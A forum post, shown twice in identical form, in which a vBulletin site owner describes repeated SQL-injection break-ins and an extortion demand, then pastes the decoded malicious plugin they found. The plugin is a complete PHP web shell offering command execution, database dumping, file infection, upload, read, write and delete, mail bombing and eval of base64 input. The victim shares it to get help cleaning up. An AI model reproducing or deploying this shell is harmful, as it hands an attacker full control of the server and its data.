lcp03o
11-27-2011, 08:37 AM
Hi
My site www.computerforums.org was hacked a few weeks back by using the search function to search a group which then enabled them to run SQL injection and get my password ( http://www.youtube.com/watch?v=ztCFJvzv3NM )
There was a patch available to stop this threat so I restored the site from a backup and installed this patch (Which did fix the issue as I tested it). But yesterday they hacked me again. So I restored the database from a week back, then I deleted all files and only uploaded the latest version of VB files and performed an upgrade to the latest version of VB. (So i have a fresh upgraded install of VB)
But again today ive been hacked. I believe they have uploaded a shell program but I can not find it. I keek changing my passwords every few hours (Username + Hosting + SQL) but they keep getting back in. Any ideas what I can do??
The hacker has been sending me messages, this is what he has told me, I dont know if the below is true but this is what he is saying
-He is using an SQL injection hack to get it
-The vubrability is in the vbulletin files, all versions (But I uploaded fresh VB files and upgraded) could it be in the database somewhere?
-he wants money to stop the attacks
--------------- Added 1322388545 at 1322388545 ---------------
i have just found out that I have been hacked using this http://itsecbiz.blogspot.com/2011/07/how-to-shell-vbulletin-408-if-you-got.html and I have decoded the file and it reads this
@set_time_limit(0);$modearr=array("cmd","sql","infect","upload","ws_ver","ws_remove","ws_read","ws_save","ws_mail","ws_eval","ws_list","ws_homedir","ws_delete","ws_makedir","ws_rmdir","ws_down");$mode=$_REQUEST['mode'];if(in_array($mode,$modearr)){ function ws_stripslashes($string){if(get_magic_quotes_gpc() ){return StripSlashes($string);}else{return $string;}}if($mode=="cmd"){$cmd=$_REQUEST['cmd'];if(function_exists('system')){system($cmd);}elsei f(function_exists('exec')){exec($cmd,$output);fore ach($output as $line){echo$line."\n";}}elseif(function_exists('shell_exec')){$output=s hell_exec($cmd);echo$output;}elseif(function_exist s('popen')){$handle=popen($cmd,"r");$read=fread($handle,2096);echo$read;pclose($hand le);}}if($mode=="sql"){$host=$_REQUEST['host'];$port=$_REQUEST['port'];$username=$_REQUEST['username'];$password=$_REQUEST['password'];$dbname=$_REQUEST['dbname'];$query=$_REQUEST['query'];$link=mysql_connect($host.":".$port,$username,$password) or die('Could not connect: '.mysql_error());if($_REQUEST['sqlCmd']=="getDbs"){$db_list=mysql_list_dbs($link);while($row=mysql_ fetch_object($db_list)){echo"Database: ".$row->Database."\n";}mysql_free_result($db_list);}if($_REQUEST['sqlCmd']=="getTables"){$result=mysql_list_tables($dbname);$num_rows=mys ql_num_rows($result);for($i=0;$i<$num_rows;$i++){echo"Table: ".mysql_tablename($result,$i)."\n";}mysql_free_result($result);}if(isset($query)){my sql_select_db($dbname,$link) or die('Could not select database');$result=mysql_query(ws_stripslashes($qu ery)) or die("nInvalid query: ".mysql_error());while($row=mysql_fetch_assoc($resu lt)){echo"Row {\n";foreach($row as $variable=>$value){echo$variable."=".$value."\n";}echo"\n}\n";}}mysql_close($link);}if($mode=="infect"){$handle=fopen($_REQUEST["sourceFile"],"r+") or die("Error reading source file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);$handle=fopen($_REQUEST['infectFile'],"r") or die("Error reading infect file");$contents2=$contents."\n";while(!feof($handle)){$contents2.=fread($handle,8 192);}fclose($handle);$fp=fopen($_REQUEST['infectFile'],'w') or die("Error writing infect file");$write=fwrite($fp,$contents2);fclose($fp);if($wr ite){echo$_REQUEST['infectFile']." Infected";}}if($mode == "upload"){if($_FILES){if (is_uploaded_file($_FILES['file']['tmp_name'])){$uploadfile = basename($_FILES['file']['name']);if (move_uploaded_file($_FILES['file']['tmp_name'], $_REQUEST['dir'].$uploadfile)){echo $uploadfile." has been uploaded!.";}else{echo "Upload Failed!!!";}}}}if($mode=="ws_ver"){echo"WebShell PHP Server v3.2";}if($mode=="ws_remove"){$handle=fopen($_REQUEST["file"],"r+") or die("Error reading file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);$contents2=preg_replace('/[<?\s]*eval.*\?>/si','',$contents);if($contents2){$fp=fopen($_REQUE ST['file'],'w') or die("Error writing file");$write=fwrite($fp,$contents2);fclose($fp);if($wr ite){echo"WebShell removed from ".$_REQUEST['file'];}}else{echo"Didnt Find Shell";}}if($mode=="ws_read"){$handle=fopen($_REQUEST['file'],"r") or die("Error with reading file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);echo$contents;}if($mode=="ws_save"){$contents=ws_stripslashes($_REQUEST["contents"]);$fp=fopen($_REQUEST['file'],'w') or die("Error writing ".$_REQUEST['file']." file");$write=fwrite($fp,$contents);fclose($fp);if($wri te){echo$_REQUEST['file']." saved";}}if($mode=="ws_mail"){$mailtimes="1";$headers='From: '.ws_stripslashes($_REQUEST['from']).'';while($mailtimes<=$_REQUEST['times']){mail(ws_stripslashes($_REQUEST['to']),ws_stripslashes($_REQUEST['subject']),ws_stripslashes($_REQUEST['msg']),$headers);$mailtimes++;}echo"Mail Bomb Complete";}if($mode=="ws_eval"){$php=$_REQUEST['php'];eval(base64_decode(ws_stripslashes($php)));}if($m ode=="ws_list"){$dir=$_REQUEST['dir'];$hook=opendir($dir) or die('cant open dir');while(false!==($file=readdir($hook))){$fpath =$dir.$file;if(is_dir($fpath)){if($file!='.'&&$file!='..'){echo"Directory: ".$file."\n";}}if($file!='.'&&$file!='..'&&!is_dir($fpath)){echo"File: ".$file."\n";}}}if($mode=="ws_homedir"){echo$_SERVER["DOCUMENT_ROOT"];}if($mode=="ws_delete"){unlink($_REQUEST['file']) or die('Cant delete file');echo"File Deleted";}if($mode=="ws_makedir"){mkdir($_REQUEST['dir'],$_REQUEST['chmod']) or die('Cant create dir');echo"Directory Created";}if($mode=="ws_rmdir"){rmdir($_REQUEST['dir']) or die('Cant remove dir');echo"Directory Removed";}if($mode=="ws_down"){header('Content-type: application/octet-stream');header('Content-Disposition: attachment; filename='.$_REQUEST['file'].'');readfile($_REQUEST['file']);}die();}
I have disabled the plugin, is this enough??
My site www.computerforums.org was hacked a few weeks back by using the search function to search a group which then enabled them to run SQL injection and get my password ( http://www.youtube.com/watch?v=ztCFJvzv3NM )
There was a patch available to stop this threat so I restored the site from a backup and installed this patch (Which did fix the issue as I tested it). But yesterday they hacked me again. So I restored the database from a week back, then I deleted all files and only uploaded the latest version of VB files and performed an upgrade to the latest version of VB. (So i have a fresh upgraded install of VB)
But again today ive been hacked. I believe they have uploaded a shell program but I can not find it. I keek changing my passwords every few hours (Username + Hosting + SQL) but they keep getting back in. Any ideas what I can do??
The hacker has been sending me messages, this is what he has told me, I dont know if the below is true but this is what he is saying
-He is using an SQL injection hack to get it
-The vubrability is in the vbulletin files, all versions (But I uploaded fresh VB files and upgraded) could it be in the database somewhere?
-he wants money to stop the attacks
--------------- Added 1322388545 at 1322388545 ---------------
i have just found out that I have been hacked using this http://itsecbiz.blogspot.com/2011/07/how-to-shell-vbulletin-408-if-you-got.html and I have decoded the file and it reads this
@set_time_limit(0);$modearr=array("cmd","sql","infect","upload","ws_ver","ws_remove","ws_read","ws_save","ws_mail","ws_eval","ws_list","ws_homedir","ws_delete","ws_makedir","ws_rmdir","ws_down");$mode=$_REQUEST['mode'];if(in_array($mode,$modearr)){ function ws_stripslashes($string){if(get_magic_quotes_gpc() ){return StripSlashes($string);}else{return $string;}}if($mode=="cmd"){$cmd=$_REQUEST['cmd'];if(function_exists('system')){system($cmd);}elsei f(function_exists('exec')){exec($cmd,$output);fore ach($output as $line){echo$line."\n";}}elseif(function_exists('shell_exec')){$output=s hell_exec($cmd);echo$output;}elseif(function_exist s('popen')){$handle=popen($cmd,"r");$read=fread($handle,2096);echo$read;pclose($hand le);}}if($mode=="sql"){$host=$_REQUEST['host'];$port=$_REQUEST['port'];$username=$_REQUEST['username'];$password=$_REQUEST['password'];$dbname=$_REQUEST['dbname'];$query=$_REQUEST['query'];$link=mysql_connect($host.":".$port,$username,$password) or die('Could not connect: '.mysql_error());if($_REQUEST['sqlCmd']=="getDbs"){$db_list=mysql_list_dbs($link);while($row=mysql_ fetch_object($db_list)){echo"Database: ".$row->Database."\n";}mysql_free_result($db_list);}if($_REQUEST['sqlCmd']=="getTables"){$result=mysql_list_tables($dbname);$num_rows=mys ql_num_rows($result);for($i=0;$i<$num_rows;$i++){echo"Table: ".mysql_tablename($result,$i)."\n";}mysql_free_result($result);}if(isset($query)){my sql_select_db($dbname,$link) or die('Could not select database');$result=mysql_query(ws_stripslashes($qu ery)) or die("nInvalid query: ".mysql_error());while($row=mysql_fetch_assoc($resu lt)){echo"Row {\n";foreach($row as $variable=>$value){echo$variable."=".$value."\n";}echo"\n}\n";}}mysql_close($link);}if($mode=="infect"){$handle=fopen($_REQUEST["sourceFile"],"r+") or die("Error reading source file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);$handle=fopen($_REQUEST['infectFile'],"r") or die("Error reading infect file");$contents2=$contents."\n";while(!feof($handle)){$contents2.=fread($handle,8 192);}fclose($handle);$fp=fopen($_REQUEST['infectFile'],'w') or die("Error writing infect file");$write=fwrite($fp,$contents2);fclose($fp);if($wr ite){echo$_REQUEST['infectFile']." Infected";}}if($mode == "upload"){if($_FILES){if (is_uploaded_file($_FILES['file']['tmp_name'])){$uploadfile = basename($_FILES['file']['name']);if (move_uploaded_file($_FILES['file']['tmp_name'], $_REQUEST['dir'].$uploadfile)){echo $uploadfile." has been uploaded!.";}else{echo "Upload Failed!!!";}}}}if($mode=="ws_ver"){echo"WebShell PHP Server v3.2";}if($mode=="ws_remove"){$handle=fopen($_REQUEST["file"],"r+") or die("Error reading file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);$contents2=preg_replace('/[<?\s]*eval.*\?>/si','',$contents);if($contents2){$fp=fopen($_REQUE ST['file'],'w') or die("Error writing file");$write=fwrite($fp,$contents2);fclose($fp);if($wr ite){echo"WebShell removed from ".$_REQUEST['file'];}}else{echo"Didnt Find Shell";}}if($mode=="ws_read"){$handle=fopen($_REQUEST['file'],"r") or die("Error with reading file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);echo$contents;}if($mode=="ws_save"){$contents=ws_stripslashes($_REQUEST["contents"]);$fp=fopen($_REQUEST['file'],'w') or die("Error writing ".$_REQUEST['file']." file");$write=fwrite($fp,$contents);fclose($fp);if($wri te){echo$_REQUEST['file']." saved";}}if($mode=="ws_mail"){$mailtimes="1";$headers='From: '.ws_stripslashes($_REQUEST['from']).'';while($mailtimes<=$_REQUEST['times']){mail(ws_stripslashes($_REQUEST['to']),ws_stripslashes($_REQUEST['subject']),ws_stripslashes($_REQUEST['msg']),$headers);$mailtimes++;}echo"Mail Bomb Complete";}if($mode=="ws_eval"){$php=$_REQUEST['php'];eval(base64_decode(ws_stripslashes($php)));}if($m ode=="ws_list"){$dir=$_REQUEST['dir'];$hook=opendir($dir) or die('cant open dir');while(false!==($file=readdir($hook))){$fpath =$dir.$file;if(is_dir($fpath)){if($file!='.'&&$file!='..'){echo"Directory: ".$file."\n";}}if($file!='.'&&$file!='..'&&!is_dir($fpath)){echo"File: ".$file."\n";}}}if($mode=="ws_homedir"){echo$_SERVER["DOCUMENT_ROOT"];}if($mode=="ws_delete"){unlink($_REQUEST['file']) or die('Cant delete file');echo"File Deleted";}if($mode=="ws_makedir"){mkdir($_REQUEST['dir'],$_REQUEST['chmod']) or die('Cant create dir');echo"Directory Created";}if($mode=="ws_rmdir"){rmdir($_REQUEST['dir']) or die('Cant remove dir');echo"Directory Removed";}if($mode=="ws_down"){header('Content-type: application/octet-stream');header('Content-Disposition: attachment; filename='.$_REQUEST['file'].'');readfile($_REQUEST['file']);}die();}
I have disabled the plugin, is this enough??